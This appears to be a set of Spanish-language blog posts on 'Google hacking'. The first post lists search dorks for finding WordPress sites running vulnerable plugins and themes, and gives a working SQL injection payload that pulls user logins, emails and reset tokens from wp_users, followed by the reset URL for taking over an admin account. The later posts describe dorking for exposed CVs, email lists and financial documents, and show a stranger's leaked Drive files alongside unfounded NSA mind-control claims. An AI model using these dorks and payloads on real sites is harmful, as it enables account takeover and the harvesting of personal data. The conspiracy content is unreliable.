Como hackear WordPress usando Dorks en Google

Hola a tod@s

Wordpress es sin duda el CMS más popular y usado por los usuarios de la blogosfera, por ello también es el más atacado debido a los miles de plugins y temas disponibles para WordPress.

Lo primero que se realiza es la parte de enumeración y como encontrar sitios que utilicen Wordpress y los plugins que utilizan.

Encontrar sitios con Wordpress:

• intext:"Proudly powered by WordPress. "
• intext:"Powered by WordPress. " 

Ver plugins instalados:

• inurl: /wordpress/wp-content/plugins/

Es hora de buscar algunas vulnerabilidades conocidas:

Listado de directorio

• "index of" inurl:wp-content/
• "inurl:"/wp-content/plugins/wp-shopping-cart/"

Una de base de datos

• "inurl:wp-content/plugins/wp-dbmanager/"

Wordpress theme Doraa XSS Vulnerability

• Themes by Bons.us

Wordpress theme Dosimple XSS Vulnerability

• "Theme by domainagan.com."

WordPress WP Symposium Plugin Cross Site Scripting

• "/wp-content/plugins/wp-symposium/"

WordPress mTheme-Unus Local File Inclusion

• ilnurl:/wp-content/themes/mTheme-Unus/

Wordpress Better-wp-security Plugin Remote Code Execution

• inurl:wp-content/plugins/better-wp-security

WordPress U-Design Theme 2.7.9 Cross Site Scripting

• inurl:/wp-theme/u-design/

 Wordpress Plugin easy-comment-uploads File Upload Vulendrability

• inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

WordPress Category and Page Icons File Upload

• index of "/wp-content/plugins/category-page-icons/"

 WordPress theme parallelus-salutation Arbitrary File Download Vulnerability

• inurl:themes/parallelus-salutation/ OR inurl:themes/parallelus-salutation/framework/

WordPress Auto-ThickBox-Plus XSS Vulnerability

inurl:"/wp-content/plugins/auto-thickbox-plus/"

Wordpress "Js Support Ticket" File Upload Bypass Extensions

inurl:/js-support-ticket-controlpanel/

WordPress Appointment Booking Calendar 1.1.24 Escalation / XSS

Index of /wordpress/wp-content/plugins/appointment-booking-calendar/

WordPress Appointment Booking Calendar 1.1.24 SQL Injection

• Index of /wordpress/wp-content/plugins/appointment-booking-calendar/

Wordpress clikstats plugin Open Redirect

• Dork: inurl:"/wp-content/plugins/clikstats/ck.php?"

Arbitrary File Upload: Easy Comment Uploads - Version - 3.2.1, usamos la siguiente dork:

• inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

Stored XSS: Versión 3.2.3, usamos la siguiente dork:

• inurl:/wp-content/plugins/count-per-day/notes.php

Arbitrary File Upload: Custom Content Type Manager, usamos la siguiente dork:

• inurl:/wp-content/plugins/custom-content-type-manager/upload_form.php

SQL Injection: Wordpress HD Webplayer - Versión 1.1, usamos la siguiente dork:

• inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=

[Full-disclosure] WordPress <= 2.8.3 Remote admin reset password. Con este obtendremos el user_login y user_email de la siguiente manera:

• /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users

Una vez obtenido el usuario o e-mail nos dirigimos a www.sitio-web.com/wp-admin y seleccionamos en ¿Olvidó su contraseña? introducimos el usuario o e-mail.

Presionar en "Get New Password" la cual el sitio web enviara un token, dicho token se almacena en la DB, por lo tanto se obtendrá dicho código de la siguiente manera:

• /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,1​0,11 from wp_users

Obtenido el token, sólo faltaría restablecer la contraseña, para ello nos dirigimos al siguiente link:

http://www.sitio-web.com/wp-login.php?action=rp&key=Token&login=Usuario

Remplazamos el token  y usuario por lo datos que nos arroja la DB, por ejemplo:

http://www.sitio-web.com/wp-login.php?action=rp&key=JAr7W8letkza&login=admin

Por lo que lograremos la opción de restablecer la password fácil, fácil y con fundamento.

Full Path Disclosure (FPD), usaremos la siguiente dork:

• inurl:"/wp-includes/

Wordpress Formcraft Plugin File Upload Vulnerability

• intext:"powered by formcraft", inurl:plugins/formcraft

Wordpress Smallbiz Themes Remote File Uploads Vulnerability

• inurl:wp-content/themes/smallbiz/palette/index.php

No seáis malos.

Usando Google para obtener datos de carácter personal y documentos confidenciales

Hola a tod@s

Es realmente sorprendente todo lo que se puede encontrar en Internet, la mayoría de las cosas publicadas por desconocimiento. Google y en general las arañas de los buscadores lo indexan todo.

Usando Google, es posible acceder a un repositorio de correo electrónico que contiene el CV de cientos de personas que fueron creadas cuando solicitan sus trabajos. Los documentos que contiene su dirección, teléfono, nombres y apellidos, e incluso DNI, etc. puede encontrarse en segundos. La exposición de estos datos puede suponer el robo de identidad entre otros riesgos importantes.

Imagen 1: Dork para encontrar CV

Imagen 2: CV públicado en Internet

  

También se puede acceder a una lista de archivos .xls (documentos Excel) que contiene los datos de contacto como direcciones de correo electrónico de un gran grupo de personas. Todas las cuentas serán víctimas de campañas de spam. Para ello, basta con escribir escriba la siguiente consulta de búsqueda:

Imagen 3: Dork para encontrar cuentas email

 

Imagen 4: Listas de cuentas email en un excel

También, es posible acceder a los documentos que potencialmente confidenciales que contienen información sobre cuentas bancarias y resúmenes financieros, números de tarjeta de crédito utilizando la siguiente consulta:

Imagen 5: Dork para búsqueda de documentos de carácter financiero 

Imagen 6: Listado de directorios con documentos

Imagen 7: Documento financiero 

 
No seáis malos.

Google Dive, la NSA y mensajes extraterrestres

Hola a tod@s

Google Drive es un servicio gratuito de almacenamiento en la nube en la que podemos guardar fotos, documentos y una gran variedad de archivos.

Una de las técnicas de hacking más fáciles de implementar y que cada día más me sorprende y gusta es el Hacking con buscadores. Es realmente sorprendente todo lo que se puede encontrar en Internet la mayoría de las cosas publicadas por desconocimiento, despistes o una mala configuración. A muchos le habrá llamado la atención el nombre que decora título y es que cuanto menos es curioso lo que encontré.

1. La mayoría de los documentos se encuentran titulados como desclasificados.
2. Desconozco que se traten de documentos oficiales o un fake.

Iniciamos la búsqueda con el siguiente dork:

Imagen 1: Búsqueda de archivos en Drive

Accedemos al directorio de Drive que nos llama la atención.

Imagen 2: Directorio Drive con contenido...

De los resultados obtenidos me sorprende uno documento titulado extraterrestrial messages. 

Imagen 3: Documento extraterrestrial messages

A continuación ficheros con information disclosure, como teléfonos, direcciones, nombres y apellidos, email, etc.

Imagen 4:  information disclosure

Como vemos este tipo tiene un popurrí de cosas varias, el próximo archivo que encontramos es un volcado de las bases de datos del ministerio de defensa de Reino Unido atribuido por Anonymous Peru.

 

Imagen 5:  Bases de datos del ministerio de defensa de Reino Unido

Y por último unas imagenes del efecto de las armas psico-electrónicas y el control de la mente usada de la NSA.

Imagen 6: armas psico-electrónicas

Imagen 7: armas psico-electrónicas

Imagen 8: armas psico-electrónicas

Imagen 9: armas psico-electrónicas 

Imagen 10: armas psico-electrónicas 

Recapitulando, hemos visto una vez más lo fácil que se puede encontrar información empleando Google Hacking y es que Google lo indexa todo. Sobre las imágenes que os he mostrado, lanzo esta reflexión, ¿Qué hace esta persona con todo ese material tan diverso? ¿Lo público con intención o por desconocimiento? Cuanto menos, es curioso. 

No seáis malos.